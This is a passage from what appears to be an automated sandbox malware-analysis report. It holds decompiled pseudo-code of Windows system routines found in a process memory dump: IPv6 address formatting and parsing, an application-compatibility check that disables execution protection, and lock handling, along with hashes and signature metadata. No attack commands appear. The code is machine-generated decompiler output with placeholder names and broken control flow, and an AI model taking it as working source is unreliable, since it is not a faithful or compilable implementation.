							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E01ED7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x1ea2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E01ED7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x1ea9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E01ED7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E01ED7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E01ED7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E01ED7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                        0x01ee13d5
                                                        0x01ee13d9
                                                        0x01ee13dc
                                                        0x01ee13de
                                                        0x01ee13e1
                                                        0x01ee13e8
                                                        0x01ee13ee
                                                        0x01f0e8fd
                                                        0x00000000
                                                        0x01f0e921
                                                        0x01f0e921
                                                        0x01f0e928
                                                        0x01f0e982
                                                        0x01f0e98a
                                                        0x00000000
                                                        0x01f0e99a
                                                        0x01f0e99e
                                                        0x01f0e9a3
                                                        0x01f0e9a8
                                                        0x01f0e9b9
                                                        0x01f0e978
                                                        0x00000000
                                                        0x01f0e978
                                                        0x01f0e98a
                                                        0x01f0e92a
                                                        0x01f0e931
                                                        0x01f0e944
                                                        0x01f0e944
                                                        0x01f0e950
                                                        0x01f0e954
                                                        0x01f0e959
                                                        0x01f0e95e
                                                        0x01f0e963
                                                        0x01f0e970
                                                        0x00000000
                                                        0x01f0e975
                                                        0x01f0e93b
                                                        0x01f0e980
                                                        0x00000000
                                                        0x01f0e980
                                                        0x01f0e942
                                                        0x01f0e94b
                                                        0x00000000
                                                        0x01f0e94b
                                                        0x00000000
                                                        0x01f0e942
                                                        0x01ee13f4
                                                        0x01ee13f4
                                                        0x01ee13f9
                                                        0x01ee13fc
                                                        0x01ee13ff
                                                        0x01ee1406
                                                        0x01f0e9cc
                                                        0x01f0e9d2
                                                        0x01f0e9d2
                                                        0x01f0e9cc
                                                        0x01ee140c
                                                        0x01ee1411
                                                        0x01ee1431
                                                        0x01ee143a
                                                        0x01ee143c
                                                        0x01ee143f
                                                        0x01ee143f
                                                        0x01ee1442
                                                        0x01ee1447
                                                        0x01ee14a8
                                                        0x01ee14ac
                                                        0x01f0e9e2
                                                        0x01f0e9e7
                                                        0x01f0e9ec
                                                        0x01f0ea05
                                                        0x01f0ea05
                                                        0x00000000
                                                        0x01ee1449
                                                        0x00000000
                                                        0x01ee1449
                                                        0x01ee144c
                                                        0x01ee1459
                                                        0x01ee1462
                                                        0x01ee1469
                                                        0x01ee146a
                                                        0x01ee1470
                                                        0x01ee1473
                                                        0x01ee1476
                                                        0x01ee1476
                                                        0x01ee1490
                                                        0x01ee1495
                                                        0x01ee138e
                                                        0x01ee1390
                                                        0x01ee1397
                                                        0x01ee1398
                                                        0x01ee1399
                                                        0x01ee13a1
                                                        0x01ee13a4
                                                        0x01ee13a4
                                                        0x01ee1498
                                                        0x01ee149c
                                                        0x01ee149f
                                                        0x01ee14a2
                                                        0x00000000
                                                        0x00000000
                                                        0x01ee14a4
                                                        0x00000000
                                                        0x01ee14a4
                                                        0x01ee1413
                                                        0x01ee1415
                                                        0x01ee1416
                                                        0x01ee1419
                                                        0x01ee141c
                                                        0x01ee1422
                                                        0x01ee13b7
                                                        0x01ee13bc
                                                        0x01ee13bf
                                                        0x01ee13bf
                                                        0x01ee13c2
                                                        0x01ee1424
                                                        0x01ee1424
                                                        0x01ee1424
                                                        0x01ee1427
                                                        0x01ee142b
                                                        0x01ee142c
                                                        0x01ee142c
                                                        0x01ee142c
                                                        0x00000000
                                                        0x01ee141c
                                                        0x01ee1411

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 94d3a7bb015312427fb08d61ed0e6e25db20eb27640d4cf93e4207e6d0e8564b
                                                        • Instruction ID: 54f15f2324d681a002930ed55a772657568878527bb11132b4be8bdfdea27e66
                                                        • Opcode Fuzzy Hash: 94d3a7bb015312427fb08d61ed0e6e25db20eb27640d4cf93e4207e6d0e8564b
                                                        • Instruction Fuzzy Hash: 4D6156B1D00696AACB35DF5DC8848BEBBF5EF98304B54D42DE5D64B641D330A680CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01ED7EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 64%
                                                        			E01ED7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x1f82088; // 0x76a06099
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E01ED7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E01EF3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E01EADFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x1f84218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E01EF3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E01EB0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E01EF3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E01EB8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E01EF3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E01F1E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E01EF3F92();
					_t38 = 1;
					L2:
					return E01EAE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                        0x01ed7f08
                                                        0x01ed7f0f
                                                        0x01ed7f12
                                                        0x01ed7f1b
                                                        0x01ed7f31
                                                        0x01ef3ead
                                                        0x01ef3eb4
                                                        0x00000000
                                                        0x00000000
                                                        0x01ef3eba
                                                        0x01ef3ecd
                                                        0x01ef3ed2
                                                        0x01ef3ee1
                                                        0x01ef3ee7
                                                        0x01ef3eec
                                                        0x01ef3f12
                                                        0x01ef3f18
                                                        0x01ef3f1a
                                                        0x00000000
                                                        0x00000000
                                                        0x01ef3f20
                                                        0x01ef3f26
                                                        0x01ef3f28
                                                        0x00000000
                                                        0x00000000
                                                        0x01ef3f2e
                                                        0x01ef3f30
                                                        0x00000000
                                                        0x00000000
                                                        0x01ef3f3a
                                                        0x01ef3f3b
                                                        0x01ef3f53
                                                        0x01ef3f64
                                                        0x01ef3f69
                                                        0x01ef3f6c
                                                        0x01ef3f6d
                                                        0x01ef3f6f
                                                        0x01efe304
                                                        0x01efe30f
                                                        0x01efe315
                                                        0x01efe31e
                                                        0x01efe321
                                                        0x01efe327
                                                        0x01efe329
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01efe32f
                                                        0x01efe32f
                                                        0x01efe337
                                                        0x01efe33a
                                                        0x01efe33b
                                                        0x01efe33d
                                                        0x01efe33f
                                                        0x01efe341
                                                        0x01efe341
                                                        0x01efe34e
                                                        0x01efe353
                                                        0x01efe358
                                                        0x01efe35d
                                                        0x01efe35f
                                                        0x00000000
                                                        0x00000000
                                                        0x01efe365
                                                        0x01efe365
                                                        0x01efe368
                                                        0x01efe36e
                                                        0x00000000
                                                        0x00000000
                                                        0x01efe374
                                                        0x01efe32f
                                                        0x01ef3f75
                                                        0x01ef3f7a
                                                        0x01ef3f7c
                                                        0x01ef3f7e
                                                        0x01ef3f86
                                                        0x01ed7f39
                                                        0x01ed7f47
                                                        0x01ed7f47
                                                        0x01ed7f37
                                                        0x01ed7f37
                                                        0x00000000

                                                        APIs
                                                        • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 01EF3F12
                                                        Strings
                                                        • ExecuteOptions, xrefs: 01EF3F04
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01EF3F4A
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01EF3EC4
                                                        • Execute=1, xrefs: 01EF3F5E
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01EFE2FB
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01EFE345
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01EF3F75
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: BaseDataModuleQuery
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 3901378454-484625025
                                                        • Opcode ID: 5cad5bee7d41319acc5fe5dc4141c80787fa559203e682214172455f2927ec08
                                                        • Instruction ID: 6c2aa99a0e5676a322f587c675493676257ea84aba9aed42cb2c12cf36d085e2
                                                        • Opcode Fuzzy Hash: 5cad5bee7d41319acc5fe5dc4141c80787fa559203e682214172455f2927ec08
                                                        • Instruction Fuzzy Hash: 3941C632A4025D7AEB319B94DCC5FEE73BDAB14704F4014A9FB45E6081E670AA858BA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EE0B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E01EE0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E01EB8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E01EADFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E01EE0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E01EE0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E01EE06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E01EE06BA(_t135, _t178) == 0 || E01EE0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E01EE0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E01EE0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E01EE06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E01EE06BA(_t124, _t142) == 0 || E01EE0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                        0x01ee0b21
                                                        0x01ee0b24
                                                        0x01ee0b27
                                                        0x01ee0b2a
                                                        0x01ee0b2d
                                                        0x01ee0b30
                                                        0x01ee0b33
                                                        0x01ee0b36
                                                        0x01ee0b39
                                                        0x01ee0b3e
                                                        0x01ee0c65
                                                        0x01ee0c68
                                                        0x01ee0c6a
                                                        0x01ee0c6f
                                                        0x01f0eb42
                                                        0x00000000
                                                        0x00000000
                                                        0x01f0eb48
                                                        0x01f0eb48
                                                        0x01ee0c75
                                                        0x01ee0c7a
                                                        0x01f0eb54
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01f0eb5a
                                                        0x01ee0c80
                                                        0x01ee0c84
                                                        0x01f0eb98
                                                        0x00000000
                                                        0x00000000
                                                        0x01f0eba6
                                                        0x01ee0cb8
                                                        0x01ee0cba
                                                        0x01ee0cd3
                                                        0x01ee0cda
                                                        0x01ee0ce4
                                                        0x01ee0ce9
                                                        0x00000000
                                                        0x01ee0cec
                                                        0x01ee0c8c
                                                        0x01f0eb63
                                                        0x00000000
                                                        0x00000000
                                                        0x01f0eb70
                                                        0x01f0eb75
                                                        0x01f0eb7d
                                                        0x00000000
                                                        0x00000000
                                                        0x01f0eb8c
                                                        0x00000000
                                                        0x01f0eb8c
                                                        0x01ee0c96
                                                        0x00000000
                                                        0x00000000
                                                        0x01ee0ca2
                                                        0x01ee0cac
                                                        0x01ee0cb4
                                                        0x00000000
                                                        0x00000000
                                                        0x01ee0b44
                                                        0x01ee0b47
                                                        0x01ee0b49
                                                        0x00000000
                                                        0x00000000
                                                        0x01ee0b4f
                                                        0x01ee0b50
                                                        0x00000000
                                                        0x00000000
                                                        0x01ee0b56
                                                        0x01ee0b62
                                                        0x01ee0b7c
                                                        0x01ee0bac
                                                        0x01ee0a0f
                                                        0x01f0eaaa
                                                        0x00000000
                                                        0x01f0eac4
                                                        0x01f0eac4
                                                        0x01ee0bd0
                                                        0x01ee0bd0
                                                        0x01ee0bd4
                                                        0x01ee0bd9
                                                        0x00000000
                                                        0x00000000
                                                        0x01ee0bdb
                                                        0x01ee0be0
                                                        0x01f0eb0e
                                                        0x01ee0a1a
                                                        0x00000000
                                                        0x01ee0a1a
                                                        0x01f0eb1a
                                                        0x01f0eb1f
                                                        0x01f0eb27
                                                        0x00000000
                                                        0x00000000
                                                        0x01f0eb36
                                                        0x00000000
                                                        0x01f0eb36
                                                        0x01ee0bea
                                                        0x00000000
                                                        0x00000000
                                                        0x01ee0bf6
                                                        0x01ee0c00
                                                        0x01ee0c03
                                                        0x01ee0c0b
                                                        0x00000000
                                                        0x01ee0c0b
                                                        0x01f0eaaa
                                                        0x00000000
                                                        0x01ee0a15
                                                        0x01ee0bb6
                                                        0x00000000
                                                        0x01ee0bc6
                                                        0x01ee0bc6
                                                        0x01ee0bcb
                                                        0x01ee0c15
                                                        0x00000000
                                                        0x00000000
                                                        0x01ee0c1d
                                                        0x01ee0c20
                                                        0x01ee0c21
                                                        0x01ee0c24
                                                        0x01ee0c24
                                                        0x01ee0c26
                                                        0x00000000
                                                        0x01ee0c26
                                                        0x01ee0bcd
                                                        0x00000000
                                                        0x01ee0bcd
                                                        0x01ee0b89
                                                        0x01ee0b89
                                                        0x01ee0b90
                                                        0x00000000
                                                        0x00000000
                                                        0x01ee0b96
                                                        0x00000000
                                                        0x01ee0b96
                                                        0x01ee0a04
                                                        0x01ee0a04
                                                        0x01ee0b9a
                                                        0x01ee0b9a
                                                        0x01ee0b9b
                                                        0x01ee0b9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01ee0ba5
                                                        0x01ee0ac7
                                                        0x01ee0aca
                                                        0x01f0eacf
                                                        0x00000000
                                                        0x01f0eade
                                                        0x01f0eade
                                                        0x01f0eae3
                                                        0x00000000
                                                        0x00000000
                                                        0x01f0eaf3
                                                        0x01f0eaf6
                                                        0x01f0eaf7
                                                        0x01f0eafe
                                                        0x01f0eb01
                                                        0x00000000
                                                        0x01f0eb01
                                                        0x01f0eacf
                                                        0x01ee0ad0
                                                        0x01ee0ad4
                                                        0x00000000
                                                        0x00000000
                                                        0x01ee0ada
                                                        0x01ee0ae6
                                                        0x01ee0c34
                                                        0x00000000
                                                        0x01ee0c47
                                                        0x01ee0c49
                                                        0x01ee0c4a
                                                        0x01ee0c4e
                                                        0x01ee0c51
                                                        0x01ee0c54
                                                        0x01ee0c57
                                                        0x01ee0c5a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01ee0c60
                                                        0x01ee0afb
                                                        0x01ee0afe
                                                        0x01ee0b02
                                                        0x01ee0b05
                                                        0x01ee0b08
                                                        0x00000000
                                                        0x01ee0b08
                                                        0x01ee0ae6
                                                        0x01ee0b44
                                                        0x01ee09f8
                                                        0x01ee09f8
                                                        0x01ee09f9
                                                        0x00000000
                                                        0x00000000
                                                        0x01f0eaa0
                                                        0x00000000

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: __fassign
                                                        • String ID: .$:$:
                                                        • API String ID: 3965848254-2308638275
                                                        • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                        • Instruction ID: 2a4fa77cd7d837edd43decadca660daddf9a53e0aaf82d92ceb2b8c5c8b3ee2c
                                                        • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                        • Instruction Fuzzy Hash: FFA1AF71E0034ADADF29CF68D8497BEBBF4BF04708F24A46AE506A7281D7B09651CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EE0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 50%
                                                        			E01EE0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
